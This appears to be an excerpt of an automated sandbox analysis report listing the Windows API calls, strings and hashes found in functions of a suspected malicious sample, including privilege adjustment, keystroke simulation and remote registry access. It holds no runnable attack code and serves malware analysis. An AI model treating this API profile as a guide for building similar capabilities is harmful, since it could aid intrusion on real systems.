                                                            • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0043D665
                                                            • IsIconic.USER32(?), ref: 0043D66E
                                                            • ShowWindow.USER32(?,00000009), ref: 0043D67B
                                                            • SetForegroundWindow.USER32(?), ref: 0043D685
                                                            • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0043D69B
                                                            • GetCurrentThreadId.KERNEL32 ref: 0043D6A2
                                                            • GetWindowThreadProcessId.USER32(?,00000000), ref: 0043D6AE
                                                            • AttachThreadInput.USER32(?,00000000,00000001), ref: 0043D6BF
                                                            • AttachThreadInput.USER32(?,00000000,00000001), ref: 0043D6C7
                                                            • AttachThreadInput.USER32(00000000,?,00000001), ref: 0043D6CF
                                                            • SetForegroundWindow.USER32(?), ref: 0043D6D2
                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 0043D6E7
                                                            • keybd_event.USER32(00000012,00000000), ref: 0043D6F2
                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 0043D6FC
                                                            • keybd_event.USER32(00000012,00000000), ref: 0043D701
                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 0043D70A
                                                            • keybd_event.USER32(00000012,00000000), ref: 0043D70F
                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 0043D719
                                                            • keybd_event.USER32(00000012,00000000), ref: 0043D71E
                                                            • SetForegroundWindow.USER32(?), ref: 0043D721
                                                            • AttachThreadInput.USER32(?,?,00000000), ref: 0043D748
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                            • String ID: Shell_TrayWnd
                                                            • API String ID: 4125248594-2988720461
                                                            • Opcode ID: c65cf632393a49513bea40c5a00901192d62317a1410f3ef3d84c68e5820f373
                                                            • Instruction ID: c1ca6a344bcdfaba0e974823023d667c19296b4d148af4653ab9434bf50545cf
                                                            • Opcode Fuzzy Hash: c65cf632393a49513bea40c5a00901192d62317a1410f3ef3d84c68e5820f373
                                                            • Instruction Fuzzy Hash: AE319671A40318BBEB206F619C49F7F7F6CEB48B50F10443AFA04EA1D1D6B45D11ABA9
                                                            APIs
                                                              • Part of subcall function 004587E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0045882B
                                                              • Part of subcall function 004587E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00458858
                                                              • Part of subcall function 004587E1: GetLastError.KERNEL32 ref: 00458865
                                                            • _memset.LIBCMT ref: 00458353
                                                            • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 004583A5
                                                            • CloseHandle.KERNEL32(?), ref: 004583B6
                                                            • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 004583CD
                                                            • GetProcessWindowStation.USER32 ref: 004583E6
                                                            • SetProcessWindowStation.USER32(00000000), ref: 004583F0
                                                            • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 0045840A
                                                              • Part of subcall function 004581CB: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00458309), ref: 004581E0
                                                              • Part of subcall function 004581CB: CloseHandle.KERNEL32(?,?,00458309), ref: 004581F2
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                                            • String ID: $default$winsta0
                                                            • API String ID: 2063423040-1027155976
                                                            • Opcode ID: 437279cf6668c4de0c45be1f5ff47ec95fcfdbb6353991e64ddc4cd982ce14e0
                                                            • Instruction ID: 3323b63beeccf06d974511bf231c05544c13643482a2b8641c754c26865e528a
                                                            • Opcode Fuzzy Hash: 437279cf6668c4de0c45be1f5ff47ec95fcfdbb6353991e64ddc4cd982ce14e0
                                                            • Instruction Fuzzy Hash: F3814871900209BFDF119FA5DC45AEE7B78AF08305F14416EFC10B6262EF399A19DB28
                                                            APIs
                                                            • FindFirstFileW.KERNEL32(?,?), ref: 0046C78D
                                                            • FindClose.KERNEL32(00000000), ref: 0046C7E1
                                                            • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0046C806
                                                            • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0046C81D
                                                            • FileTimeToSystemTime.KERNEL32(?,?), ref: 0046C844
                                                            • __swprintf.LIBCMT ref: 0046C890
                                                            • __swprintf.LIBCMT ref: 0046C8D3
                                                              • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
                                                            • __swprintf.LIBCMT ref: 0046C927
                                                              • Part of subcall function 00423698: __woutput_l.LIBCMT ref: 004236F1
                                                            • __swprintf.LIBCMT ref: 0046C975
                                                              • Part of subcall function 00423698: __flsbuf.LIBCMT ref: 00423713
                                                              • Part of subcall function 00423698: __flsbuf.LIBCMT ref: 0042372B
                                                            • __swprintf.LIBCMT ref: 0046C9C4
                                                            • __swprintf.LIBCMT ref: 0046CA13
                                                            • __swprintf.LIBCMT ref: 0046CA62
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
                                                            • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                            • API String ID: 3953360268-2428617273
                                                            • Opcode ID: 77525ac0cfac28e2ae67cd84ccd41d374f9895f2458c58216a587ca322c69e5f
                                                            • Instruction ID: 7d9c3182f1c50569ad22dcb29b7867164fdd6ce968260aea251e7ba13e5350ae
                                                            • Opcode Fuzzy Hash: 77525ac0cfac28e2ae67cd84ccd41d374f9895f2458c58216a587ca322c69e5f
                                                            • Instruction Fuzzy Hash: AFA13EB1504304ABC710EFA5C885DAFB7ECFF94708F40492EF585D6192EA38DA08CB66
                                                            APIs
                                                            • FindFirstFileW.KERNEL32(?,?,76228FB0,?,00000000), ref: 0046EFB6
                                                            • _wcscmp.LIBCMT ref: 0046EFCB
                                                            • _wcscmp.LIBCMT ref: 0046EFE2
                                                            • GetFileAttributesW.KERNEL32(?), ref: 0046EFF4
                                                            • SetFileAttributesW.KERNEL32(?,?), ref: 0046F00E
                                                            • FindNextFileW.KERNEL32(00000000,?), ref: 0046F026
                                                            • FindClose.KERNEL32(00000000), ref: 0046F031
                                                            • FindFirstFileW.KERNEL32(*.*,?), ref: 0046F04D
                                                            • _wcscmp.LIBCMT ref: 0046F074
                                                            • _wcscmp.LIBCMT ref: 0046F08B
                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 0046F09D
                                                            • SetCurrentDirectoryW.KERNEL32(004B8920), ref: 0046F0BB
                                                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 0046F0C5
                                                            • FindClose.KERNEL32(00000000), ref: 0046F0D2
                                                            • FindClose.KERNEL32(00000000), ref: 0046F0E4
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                                            • String ID: *.*
                                                            • API String ID: 1803514871-438819550
                                                            • Opcode ID: 6ca42bdee5e764a2d4c938babfd9147ccfee36eb28773e9f100ec5c7d0d625b2
                                                            • Instruction ID: e0d4b25dfa95f140917fd6c0b332215adfde449a0ea65fd213ed944f24ec6cf3
                                                            • Opcode Fuzzy Hash: 6ca42bdee5e764a2d4c938babfd9147ccfee36eb28773e9f100ec5c7d0d625b2
                                                            • Instruction Fuzzy Hash: EC31E7325011187ADF14EFA4EC48AEF77AC9F44360F10057BE844D2191EB79DA88CB6E
                                                            APIs
                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00480953
                                                            • RegCreateKeyExW.ADVAPI32(?,?,00000000,0048F910,00000000,?,00000000,?,?), ref: 004809C1
                                                            • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00480A09
                                                            • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00480A92
                                                            • RegCloseKey.ADVAPI32(?), ref: 00480DB2
                                                            • RegCloseKey.ADVAPI32(00000000), ref: 00480DBF
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: Close$ConnectCreateRegistryValue
                                                            • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                            • API String ID: 536824911-966354055
                                                            • Opcode ID: 6981eda69d7c4072daa770cbfc60c76714524ffd3feea76163fc9223bc30861a
                                                            • Instruction ID: 75f0257f13d9dd97868b06569ad7b6a65722ecc89240c550ead6eefe92fcdcfb
                                                            • Opcode Fuzzy Hash: 6981eda69d7c4072daa770cbfc60c76714524ffd3feea76163fc9223bc30861a
                                                            • Instruction Fuzzy Hash: 3E023A756106119FCB54EF15D841E2AB7E5FF89314F04886EF8899B3A2CB38EC45CB89
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 0DJ$0EJ$0FJ$3cA$ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)$pGJ$_A
                                                            • API String ID: 0-559809668
                                                            • Opcode ID: 6a8c43c5cd2287656802195d535ea908290b48d8ab3bfd826a36c9d68e310c78
                                                            • Instruction ID: 6096d484c95c14ad7aa8192e29e4e3e8d71b99b3f093478e4f466f6acf52d5c9
                                                            • Opcode Fuzzy Hash: 6a8c43c5cd2287656802195d535ea908290b48d8ab3bfd826a36c9d68e310c78
                                                            • Instruction Fuzzy Hash: 13727E75E002199BDB14CF59C8807EEB7B5FF48311F15816BE809EB291E7389E85CB98
                                                            APIs
                                                            • FindFirstFileW.KERNEL32(?,?,76228FB0,?,00000000), ref: 0046F113
                                                            • _wcscmp.LIBCMT ref: 0046F128
                                                            • _wcscmp.LIBCMT ref: 0046F13F
                                                              • Part of subcall function 00464385: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 004643A0
                                                            • FindNextFileW.KERNEL32(00000000,?), ref: 0046F16E
                                                            • FindClose.KERNEL32(00000000), ref: 0046F179
                                                            • FindFirstFileW.KERNEL32(*.*,?), ref: 0046F195
                                                            • _wcscmp.LIBCMT ref: 0046F1BC
                                                            • _wcscmp.LIBCMT ref: 0046F1D3
                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 0046F1E5
                                                            • SetCurrentDirectoryW.KERNEL32(004B8920), ref: 0046F203
                                                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 0046F20D
                                                            • FindClose.KERNEL32(00000000), ref: 0046F21A
                                                            • FindClose.KERNEL32(00000000), ref: 0046F22C
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                                            • String ID: *.*
                                                            • API String ID: 1824444939-438819550
                                                            • Opcode ID: 5e4c1ca136502ca1550e0c7352cbc5842e7fcfe98f56b9ff86b85f6952a77760
                                                            • Instruction ID: 359f8111c83e04d014ff149dee767818393646aa3285bf91305061d844a33625
                                                            • Opcode Fuzzy Hash: 5e4c1ca136502ca1550e0c7352cbc5842e7fcfe98f56b9ff86b85f6952a77760
                                                            • Instruction Fuzzy Hash: 1031C3365001196ADF10AEA4FC54AEE77AC9F45360F2005BBE844A2190EA39DE89CA6D
                                                            APIs
                                                            • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0046A20F
                                                            • __swprintf.LIBCMT ref: 0046A231
                                                            • CreateDirectoryW.KERNEL32(?,00000000), ref: 0046A26E
                                                            • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 0046A293
                                                            • _memset.LIBCMT ref: 0046A2B2
                                                            • _wcsncpy.LIBCMT ref: 0046A2EE
                                                            • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 0046A323
                                                            • CloseHandle.KERNEL32(00000000), ref: 0046A32E
                                                            • RemoveDirectoryW.KERNEL32(?), ref: 0046A337
                                                            • CloseHandle.KERNEL32(00000000), ref: 0046A341
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                            • String ID: :$\$\??\%s
                                                            • API String ID: 2733774712-3457252023
                                                            • Opcode ID: f5c4c2d66afbbd10ee5f85d9a25c73fd31d49a88663bd8fadf72adc8619a6d0a
                                                            • Instruction ID: f10b276181cf8096dd79107661fba1eb4aa855f6953dd7c4d63ebe7d830bec3b
                                                            • Opcode Fuzzy Hash: f5c4c2d66afbbd10ee5f85d9a25c73fd31d49a88663bd8fadf72adc8619a6d0a
                                                            • Instruction Fuzzy Hash: 1E31C571500119ABDB20DFA0DC49FEF77BCEF88704F1044BAF908E2260E77496948B29
                                                            APIs
                                                            • GetKeyboardState.USER32(?), ref: 00460097
                                                            • SetKeyboardState.USER32(?), ref: 00460102
                                                            • GetAsyncKeyState.USER32(000000A0), ref: 00460122
                                                            • GetKeyState.USER32(000000A0), ref: 00460139
                                                            • GetAsyncKeyState.USER32(000000A1), ref: 00460168
                                                            • GetKeyState.USER32(000000A1), ref: 00460179
                                                            • GetAsyncKeyState.USER32(00000011), ref: 004601A5
                                                            • GetKeyState.USER32(00000011), ref: 004601B3
                                                            • GetAsyncKeyState.USER32(00000012), ref: 004601DC
                                                            • GetKeyState.USER32(00000012), ref: 004601EA
                                                            • GetAsyncKeyState.USER32(0000005B), ref: 00460213
                                                            • GetKeyState.USER32(0000005B), ref: 00460221
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: State$Async$Keyboard
                                                            • String ID:
                                                            • API String ID: 541375521-0
                                                            • Opcode ID: f2f36dec6c4a46bfceebef3e5bbc60e354e372eebad2095a13b7bb07ab711d72
                                                            • Instruction ID: c6705f0abb03acfe1c66d12a8beead0d319d3067caf51b1e954f1b2a293a3a50
                                                            • Opcode Fuzzy Hash: f2f36dec6c4a46bfceebef3e5bbc60e354e372eebad2095a13b7bb07ab711d72
                                                            • Instruction Fuzzy Hash: 7F51BC2090478829FB35D7A098547EBBFB49F12380F08459F99C2566C3FA5C9A8CC75B
                                                            APIs
                                                              • Part of subcall function 00480E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0047FDAD,?,?), ref: 00480E31
                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 004804AC
                                                              • Part of subcall function 00409837: __itow.LIBCMT ref: 00409862
                                                              • Part of subcall function 00409837: __swprintf.LIBCMT ref: 004098AC
                                                            • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0048054B
                                                            • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 004805E3
                                                            • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00480822
                                                            • RegCloseKey.ADVAPI32(00000000), ref: 0048082F
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                                            • String ID:
                                                            • API String ID: 1240663315-0
                                                            • Opcode ID: b5d6b35ea8ebe0d010c7e55f3e15d862d1f454c99d69da38caedf5bf36670647
                                                            • Instruction ID: efbac3d2c4afa975f371ae5d5fee671ec22ce1fa5a9a6cb729be810612663562
                                                            • Opcode Fuzzy Hash: b5d6b35ea8ebe0d010c7e55f3e15d862d1f454c99d69da38caedf5bf36670647
                                                            • Instruction Fuzzy Hash: A5E16E71614200AFCB54EF25C891D2FBBE4EF89314B04896EF84ADB3A2D634ED45CB56
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                            • String ID:
                                                            • API String ID: 1737998785-0
                                                            • Opcode ID: 0df1e9f21622c81d98583a297edaa4e67f2beae9162bbdb6d1b4a4ef07667aeb
                                                            • Instruction ID: 6a8dd1f95291b63ae5b16d2a5a0d869dcb5166510358231783c1e180ef80644f
                                                            • Opcode Fuzzy Hash: 0df1e9f21622c81d98583a297edaa4e67f2beae9162bbdb6d1b4a4ef07667aeb
                                                            • Instruction Fuzzy Hash: CE2191352002109FDB00AF54EC09B6E7BA8EF44751F10847AF945E72A2EB38AC05CB5D
                                                            APIs
                                                              • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
                                                            • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 0046F440
                                                            • Sleep.KERNEL32(0000000A), ref: 0046F470
                                                            • _wcscmp.LIBCMT ref: 0046F484
                                                            • _wcscmp.LIBCMT ref: 0046F49F
                                                            • FindNextFileW.KERNEL32(?,?), ref: 0046F53D
                                                            • FindClose.KERNEL32(00000000), ref: 0046F553
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
                                                            • String ID: *.*
                                                            • API String ID: 713712311-438819550
                                                            • Opcode ID: 92a288f11230d480a522b0c0f936cc6b9b9cd0aeee01b41ae93ea83b3e82efad
                                                            • Instruction ID: 52678bcd3f78e7a2dee1500e624958e336d76892905c76040bb4fc6126c74c58
                                                            • Opcode Fuzzy Hash: 92a288f11230d480a522b0c0f936cc6b9b9cd0aeee01b41ae93ea83b3e82efad
